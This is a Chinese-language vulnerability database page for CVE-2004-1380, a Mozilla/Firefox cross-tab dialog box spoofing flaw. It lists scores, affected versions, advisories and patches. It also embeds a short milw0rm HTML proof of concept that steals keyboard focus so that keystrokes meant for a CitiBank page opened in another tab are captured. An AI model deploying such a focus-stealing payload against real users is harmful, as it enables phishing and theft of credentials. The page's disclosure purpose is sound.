CVE-2004-1380
CVSS5.0
发布时间 :2004-10-20 00:00:00
修订时间 :2010-08-21 00:22:19
NMCOES    

[原文]Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows and facilitate phishing attacks, aka the "Dialog Box Spoofing Vulnerability."


[CNNVD]Mozilla浏览器跨地域对话框欺骗漏洞(CNNVD-200410-055)

        Firefox 1.0之前版本和Mozilla 1.7.5之前版本允许闲置的(后台)制表符展开对话框,远程攻击者可以欺骗在其他窗口中来自于网站的对话框并且促进钓鱼攻击,也称为"Dialog Box Spoofing Vulnerability"。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mozilla:firefox:0.9Mozilla Firefox 0.9
cpe:/a:mozilla:mozilla:1.5.1Mozilla Mozilla 1.5.1
cpe:/a:mozilla:mozilla:1.7Mozilla Mozilla 1.7
cpe:/a:mozilla:mozilla:1.5Mozilla Mozilla 1.5
cpe:/a:mozilla:firefox:0.9.2Mozilla Firefox 0.9.2
cpe:/a:mozilla:firefox:0.10Mozilla Firefox 0.10
cpe:/a:mozilla:mozilla:1.5:rc1Mozilla Mozilla 1.5 rc1
cpe:/a:mozilla:mozilla:1.7.3Mozilla Mozilla 1.7.3
cpe:/a:mozilla:mozilla:1.7.1Mozilla Mozilla 1.7.1
cpe:/a:mozilla:firefox:0.8Mozilla Firefox 0.8
cpe:/a:mozilla:mozilla:1.4:alphaMozilla Mozilla 1.4a
cpe:/a:mozilla:mozilla:1.3Mozilla Mozilla 1.3
cpe:/a:mozilla:mozilla:1.4.1Mozilla Mozilla 1.4.1
cpe:/a:mozilla:mozilla:1.6:betaMozilla Mozilla 1.6 beta
cpe:/a:mozilla:mozilla:1.7:rc3Mozilla Mozilla 1.7 rc3
cpe:/a:mozilla:mozilla:1.7:alphaMozilla Mozilla 1.7 alpha
cpe:/a:mozilla:firefox:0.10.1Mozilla Firefox 0.10.1
cpe:/a:mozilla:mozilla:1.7.2Mozilla Mozilla 1.7.2
cpe:/a:mozilla:mozilla:1.7:rc1Mozilla Mozilla 1.7 rc1
cpe:/a:mozilla:mozilla:1.4Mozilla Mozilla 1.4
cpe:/a:mozilla:mozilla:1.6:alphaMozilla Mozilla 1.6 alpha
cpe:/a:mozilla:mozilla:1.5:rc2Mozilla Mozilla 1.5 rc2
cpe:/a:mozilla:mozilla:1.7:betaMozilla Mozilla 1.7 beta
cpe:/a:mozilla:mozilla:1.6Mozilla Mozilla 1.6
cpe:/a:mozilla:firefox:0.9.1Mozilla Firefox 0.9.1
cpe:/a:mozilla:mozilla:1.7:rc2Mozilla Mozilla 1.7 rc2
cpe:/a:mozilla:firefox:0.9.3Mozilla Firefox 0.9.3
cpe:/a:mozilla:mozillaMozilla Mozilla
cpe:/a:mozilla:firefox:0.9:rcMozilla Firefox 0.9 rc
cpe:/a:mozilla:mozilla:1.5:alphaMozilla Mozilla 1.5 alpha

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10211Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to sp...
oval:org.mitre.oval:def:100050Mozilla Inactive Tab Dialog Box Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1380
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1380
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-055
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/18864
(PATCH)  XF  web-browser-modal-spoofing(18864)
http://www.redhat.com/support/errata/RHSA-2005-335.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:335
http://www.redhat.com/support/errata/RHSA-2005-323.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:323
http://www.mozilla.org/security/announce/mfsa2005-05.html
(VENDOR_ADVISORY)  CONFIRM  http://www.mozilla.org/security/announce/mfsa2005-05.html
http://secunia.com/advisories/12712
(VENDOR_ADVISORY)  SECUNIA  12712
http://secunia.com/multiple_browsers_form_field_focus_test/
(VENDOR_ADVISORY)  MISC  http://secunia.com/multiple_browsers_form_field_focus_test/
http://secunia.com/multiple_browsers_dialog_box_spoofing_test/
(VENDOR_ADVISORY)  MISC  http://secunia.com/multiple_browsers_dialog_box_spoofing_test/

- 漏洞信息

Mozilla浏览器跨地域对话框欺骗漏洞
中危 访问验证错误
2004-10-20 00:00:00 2005-10-20 00:00:00
远程  
        Firefox 1.0之前版本和Mozilla 1.7.5之前版本允许闲置的(后台)制表符展开对话框,远程攻击者可以欺骗在其他窗口中来自于网站的对话框并且促进钓鱼攻击,也称为"Dialog Box Spoofing Vulnerability"。

- 公告与补丁

        Mozilla has released version 1.0.1 of Firefox to address this, and other issues:
        SGI has released an advisory 20050304-01-U including updated SGI ProPack 3 Service Pack 4 packages to address this issue. Please see the referenced advisory for more information.
        Slackware Linux has released advisory SSA:2005-085-01 along with fixes dealing with this issue. Please see the reference section for more information.
        RedHat has released advisories RHSA-2005:323 and RHSA-2005:335 to address this issue. Please see the referenced advisories to obtain fix information.
        RedHat Fedora Legacy has released advisory FLSA:152883 addressing this and other issues for RedHat Linux 7.3, 9 and for Fedora Core 1 and Core 2. Please see the referenced advisory for details on obtaining and applying the appropriate updates.
        Netscape Browser 8.0 has been released to address various security issues.
        Please see the vendor advisory in Web references for more information.
        Mozilla Firefox 0.10.1
        
        Mozilla Firefox 1.0
        
        
        Netscape Netscape 7.0
        
        Netscape Netscape 7.1
        
        Netscape Netscape 7.2
        

- 漏洞信息 (589)

Multiple (Almost all) Browsers Tabbed Browsing Vulnerabilities (EDBID:589)
windows remote
2004-10-22 Verified
0 Jakob Balle
N/A [点击下载]
<b>Test Your Browser</b><br> 
      <br> 
      Open the link below in a new tab, then try to type data into form fields on the CitiBank website.<br> 
      <br> 
      <a href="http://www.citibank.com/" onMouseOver="setInterval('document.myform.userinput.focus();', 10);">Open this Link in New Tab</a><br> 
      <br> 
      <form name="myform"> 
        <b>Result: (Keystrokes you pressed on the CitiBank website.)</b><br> 
        <textarea name="userinput" rows="3"></textarea> 
      </form> 

// milw0rm.com [2004-10-22]
		

- 漏洞信息

10983
Multiple Browser Cross Tab Dialog Box Spoofing
Remote / Network Access Information Disclosure
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Multiple web browsers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered by an attacker creating a specially-crafted web page that would produce an inactive tab or window to launch a dialog box that appears to come from a trusted source, which could disclose sensitive information resulting in a loss of confidentiality.

- 时间线

2004-10-20 Unknow
2004-10-20 Unknow

- 解决方案

Upgrades are currently available from these vendors to remediate this vulnerability: KDE: Upgrade to version 3.3.1 A workaround is available for: Mozilla FireFox Netscape Opera Avant Browser Safari Maxthon Internet Explorer for Mac It is possible to correct the flaw by implementing the following workaround(s): 1. Disable JavaScript 2. Do not visit untrusted and trusted websites at the same time.

- 相关参考

- 漏洞作者

- 漏洞信息

Mozilla Browser Cross-Domain Dialog Box Spoofing Vulnerability
Access Validation Error 11473
Yes No
2004-10-20 12:00:00 2009-07-12 08:06:00
Discovery of this vulnerability is credited to Jakob Balle of Secunia Research.

- 受影响的程序版本

SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Linux 7.3 i686
RedHat Linux 7.3 i386
RedHat Linux 7.3
Red Hat Fedora Core2
Red Hat Fedora Core1
Netscape Netscape 7.2
Netscape Netscape 7.1
Netscape Netscape 7.0
Netscape Navigator 7.2
Mozilla Firefox 1.0
+ Gentoo Linux
+ Gentoo Linux
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 9.0
+ Slackware Linux 10.1
+ Slackware Linux 10.0
+ Slackware Linux 10.0
+ Slackware Linux 9.1
+ Slackware Linux 9.1
+ Slackware Linux -current
+ Slackware Linux -current
Mozilla Firefox 0.10.1
Mozilla Camino 0.8
Mozilla Browser 1.7.6
+ HP HP-UX B.11.23
+ HP HP-UX B.11.23
+ HP HP-UX B.11.22
+ HP HP-UX B.11.22
+ HP HP-UX B.11.11
+ HP HP-UX B.11.11
+ HP HP-UX B.11.11
+ HP HP-UX B.11.11
+ HP HP-UX B.11.00
+ HP HP-UX B.11.00
+ Red Hat Enterprise Linux AS 4
+ Red Hat Enterprise Linux AS 4
+ RedHat Desktop 4.0
+ RedHat Desktop 4.0
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
+ RedHat Enterprise Linux WS 4
+ Turbolinux Home
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 10.0
+ Turbolinux Turbolinux Server 10.0
Mozilla Browser 1.7.3
+ HP HP-UX B.11.23
+ HP HP-UX B.11.22
+ HP HP-UX B.11.22
+ HP HP-UX B.11.11
+ HP HP-UX B.11.11
+ HP HP-UX B.11.11
+ HP HP-UX B.11.11
+ HP HP-UX B.11.00
+ HP HP-UX B.11.00
+ HP Tru64 5.1 B-2 PK4 (BL25)
+ HP Tru64 5.1 B-2 PK4 (BL25)
+ HP Tru64 5.1 B-2 PK4
+ HP Tru64 5.1 B-2 PK4
+ HP Tru64 5.1 B PK4
+ HP Tru64 5.1 B PK4
+ HP Tru64 5.1 A PK6 (BL24)
+ HP Tru64 5.1 A PK6 (BL24)
+ HP Tru64 5.1 A PK6
+ HP Tru64 5.1 A PK6
Mozilla Browser 1.7.2
Mozilla Browser 1.4.4
+ Red Hat Enterprise Linux AS 3
+ Red Hat Enterprise Linux AS 3
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Desktop 3.0
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 3
+ RedHat Enterprise Linux WS 3
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
GNOME Epiphany 1.4.4
GNOME Epiphany 1.4
GNOME Epiphany 1.2.9
GNOME Epiphany 1.2
Galeon Galeon Browser 1.3.18
Galeon Galeon Browser 1.2.13
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
Galeon Galeon Browser 1.2.7
Galeon Galeon Browser 1.2.6
Galeon Galeon Browser 1.2.5
Galeon Galeon Browser 1.2.4
Galeon Galeon Browser 1.2.3
Galeon Galeon Browser 1.2.2
Netscape Netscape 8.0
Mozilla Firefox 1.0.1
+ Red Hat Fedora Core3

- 不受影响的程序版本

Netscape Netscape 8.0
Mozilla Firefox 1.0.1
+ Red Hat Fedora Core3

- 漏洞讨论

Mozilla Browsers are reported prone to a cross-domain dialog box spoofing vulnerability. This issue may allow a remote attacker to carry out phishing style attacks as an attacker may exploit this vulnerability to spoof an interface of a trusted web site.

Due to code similarities, Netscape Navigator is affected by this issue as well.

- 漏洞利用

An exploit is not required.

A proof of concept is available from the following location:

http://secunia.com/multiple_browsers_dialog_box_spoofing_test/

- 解决方案

Mozilla has released version 1.0.1 of Firefox to address this, and other issues:

SGI has released an advisory 20050304-01-U including updated SGI ProPack 3 Service Pack 4 packages to address this issue. Please see the referenced advisory for more information.

Slackware Linux has released advisory SSA:2005-085-01 along with fixes dealing with this issue. Please see the reference section for more information.

RedHat has released advisories RHSA-2005:323 and RHSA-2005:335 to address this issue. Please see the referenced advisories to obtain fix information.

RedHat Fedora Legacy has released advisory FLSA:152883 addressing this and other issues for RedHat Linux 7.3, 9 and for Fedora Core 1 and Core 2. Please see the referenced advisory for details on obtaining and applying the appropriate updates.

Netscape Browser 8.0 has been released to address various security issues.
Please see the vendor advisory in Web references for more information.


Mozilla Firefox 0.10.1

Mozilla Firefox 1.0

Netscape Netscape 7.0

Netscape Netscape 7.1

Netscape Netscape 7.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站